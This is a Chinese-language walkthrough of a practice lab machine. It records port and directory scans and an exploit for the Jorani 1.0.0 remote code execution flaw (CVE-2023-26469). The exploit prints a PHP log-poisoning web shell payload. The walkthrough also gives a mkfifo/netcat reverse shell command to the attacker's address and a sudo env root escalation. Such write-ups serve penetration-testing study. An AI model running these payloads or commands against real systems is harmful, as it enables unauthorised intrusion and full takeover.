主要知识点
- /usr/bin/env提权
具体步骤
执行nmap扫描
Starting Nmap 7.95 ( https://nmap.org ) at 2024-10-27 19:54 China Standard Time
Nmap scan report for 192.168.221.109
Host is up (0.069s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 76:18:f1:19:6b:29:db:da:3d:f6:7b:ab:f4:b5:63:e0 (ECDSA)
|_ 256 cb:d8:d6:ef:82:77:8a:25:32:08:dd:91:96:8d:ab:7d (ED25519)
80/tcp open http Apache httpd 2.4.58 ((Ubuntu))
|_http-trane-info: Problem with XML parsing of /evox/about
|_http-server-header: Apache/2.4.58 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
| http-robots.txt: 1 disallowed entry
|_/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
发现80端口开放,但看不到任何内容,所以dirb一下,发现了很多路径开放,也有很多潜在的线索
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.221.109
[+] Method: GET
[+] Threads: 10
[+] Wordlist: C:\Users\Administrator\Documents\tools\SecLists-2024.3\SecLists-2024.3\Discovery\Web-Content\quickhits.txt
[+] Negative Status codes: 307,400,403,404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.gitattributes (Status: 200) [Size: 505]
/.gitignore (Status: 200) [Size: 477]
/composer.json (Status: 200) [Size: 973]
/composer.lock (Status: 200) [Size: 91293]
/docker-compose.yml (Status: 200) [Size: 499]
/Dockerfile (Status: 200) [Size: 879]
/phpunit.xml (Status: 200) [Size: 465]
/README.md (Status: 200) [Size: 4958]
/sonar-project.properties (Status: 200) [Size: 336]
/sql/ (Status: 200) [Size: 2898]
/tests (Status: 301) [Size: 318] [--> http://192.168.221.109/tests/]
Progress: 2565 / 2566 (99.96%)
===============================================================
Finished
===============================================================
最终发现一个登录页面,是Jorani v1.0.0,
搜索一下相应的vulnerability信息,发现了
Jorani 1.0.0 - Remote Code Execution (CVE-2023-26469) - Vulnerability & Exploit Database
按照其中描述的exp,在本地执行
PS C:\Users\Administrator\Documents\OFFSEC\Practice\GoToWork\Jordak> python .\CVE_Jorani.py http://192.168.221.109
/!\ Do not use this if you are not authorized to /!\
[?] POC made by @jrjgjk (Guilhem RIOUX)
[?] Header used for exploit: FNUAWCDCVYLM
[?] Requesting session cookie
[?] Poisonning log file with payload: '<?php if(isset($_SERVER['HTTP_FNUAWCDCVYLM'])){system(base64_decode($_SERVER['HTTP_FNUAWCDCVYLM']));} ?>'
[?] Set path traversal to '../../application/logs'
[+] Recoveredd CSRF Token: 8d68027d90188dcbad14f3ad9ccaf80e
[?] Accessing log file: log-2024-10-27
jrjgjk@jorani(PSEUDO-TERM)
$ id
uid=1000(jordak) gid=1000(jordak) groups=1000(jordak),27(sudo)
jrjgjk@jorani(PSEUDO-TERM)
$ rm /tmp/f ; mkfifo /tmp/f;cat /tmp/f | /bin/bash -i 2>&1 | nc 192.168.45.192 80 >/tmp/f
但是exp自带的命令行并不是一个真正的shell,于是我们需要建立一个reverse shell先,发现 jordak属于sudo组,并且可以不需要密码执行/usr/bin/env
jordak@jordak:/home/jordak$ id
id
uid=1000(jordak) gid=1000(jordak) groups=1000(jordak),27(sudo)
jordak@jordak:/home/jordak$ sudo -l
sudo -l
Matching Defaults entries for jordak on jordak:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User jordak may run the following commands on jordak:
(ALL : ALL) ALL
(ALL) NOPASSWD: /usr/bin/env
搜索一下GTFObings,得到 /usr/bin/env可以使用如下方式提权
提权成功
sudo /usr/bin/env /bin/bash
id
uid=0(root) gid=0(root) groups=0(root)
cat /root/proof.txt
47f2032a288a0d113c92c07df6a9ad18